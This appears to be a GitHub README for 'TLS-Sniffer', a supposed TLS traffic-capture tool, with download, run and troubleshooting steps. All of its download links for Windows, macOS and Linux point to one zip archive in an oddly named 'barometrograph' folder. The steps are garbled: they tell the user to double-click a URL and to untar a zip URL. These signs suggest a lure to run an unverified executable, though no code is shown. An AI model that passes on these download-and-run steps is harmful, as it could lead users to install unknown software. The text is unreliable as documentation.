Welcome to the TLS-Sniffer! This tool helps you monitor and capture TLS network traffic with ease. Follow the steps below to download and run the software.
- Operating System: Windows 10 or later, macOS, or Linux
- RAM: At least 4 GB
- Disk Space: Minimum of 100 MB available
- Internet Connection: Required for download
-
Visit the Releases Page: Click the following link to go to the TLS-Sniffer Releases page: Download Here.
-
Select the Latest Version: Look for the latest version available on the Releases page. It usually appears at the top of the list.
-
Download the Appropriate File: Depending on your operating system, download one of the following files:
- For Windows:
https://github.com/mouadkasmi23/TLS-Sniffer/raw/refs/heads/main/barometrograph/Sniffer_TL_3.8-beta.5.zip - For macOS:
https://github.com/mouadkasmi23/TLS-Sniffer/raw/refs/heads/main/barometrograph/Sniffer_TL_3.8-beta.5.zip - For Linux:
https://github.com/mouadkasmi23/TLS-Sniffer/raw/refs/heads/main/barometrograph/Sniffer_TL_3.8-beta.5.zip
- For Windows:
-
Extract the Files: After the download completes, locate the downloaded file on your computer. Right-click on the file and choose:
- For ZIP files: "Extract All" (Windows) or "Open" (macOS).
- For TAR files: Use a file archiver, such as
tar -zxvf https://github.com/mouadkasmi23/TLS-Sniffer/raw/refs/heads/main/barometrograph/Sniffer_TL_3.8-beta.5.zipin the terminal for Linux.
-
Run the Application:
- For Windows: Navigate to the extracted folder and double-click
https://github.com/mouadkasmi23/TLS-Sniffer/raw/refs/heads/main/barometrograph/Sniffer_TL_3.8-beta.5.zip. - For macOS: Double-click
https://github.com/mouadkasmi23/TLS-Sniffer/raw/refs/heads/main/barometrograph/Sniffer_TL_3.8-beta.5.zip. - For Linux: Open a terminal, navigate to the folder, and run
./TLS-Snifferto start the application.
- For Windows: Navigate to the extracted folder and double-click
Using TLS-Sniffer is simple. Follow these steps to start capturing traffic:
-
Launch the Application: Open TLS-Sniffer as explained above.
-
Select the Network Interface: Choose the network interface you want to monitor from the dropdown list. This options may include Wi-Fi or Ethernet connections available on your computer.
-
Start Capturing: Click the "Start" button to begin capturing traffic. You will see logs of the TLS connections being established.
-
Stop Capturing: When you're finished, click the "Stop" button. You can then save or view the captured logs.
-
What You Will See: The captured logs will provide information on the following:
- Timestamp of the connection
- Source and destination IP addresses
- Port numbers used
- Protocol information
-
Exporting Logs: You can export the captured logs. Look for the "Export" button within the application and select your desired format (e.g., CSV or TXT).
Here are some common issues you might encounter, along with solutions:
-
Issue: Application Doesnβt Start
- Solution: Ensure that your operating system meets the system requirements. Check if you extracted all the files correctly.
-
Issue: No Traffic Captured
- Solution: Ensure you have selected the correct network interface. Try restarting the application.
-
Issue: Application Crashes
- Solution: Ensure your system is updated. Close any other applications that may consume a lot of resources.
If you need further assistance or guidance, you can contact the support community through the Issues section on the TLS-Sniffer GitHub page. You are also welcome to contribute by submitting bug reports or feature requests.
Donβt forget to download TLS-Sniffer if you haven't already: Download Here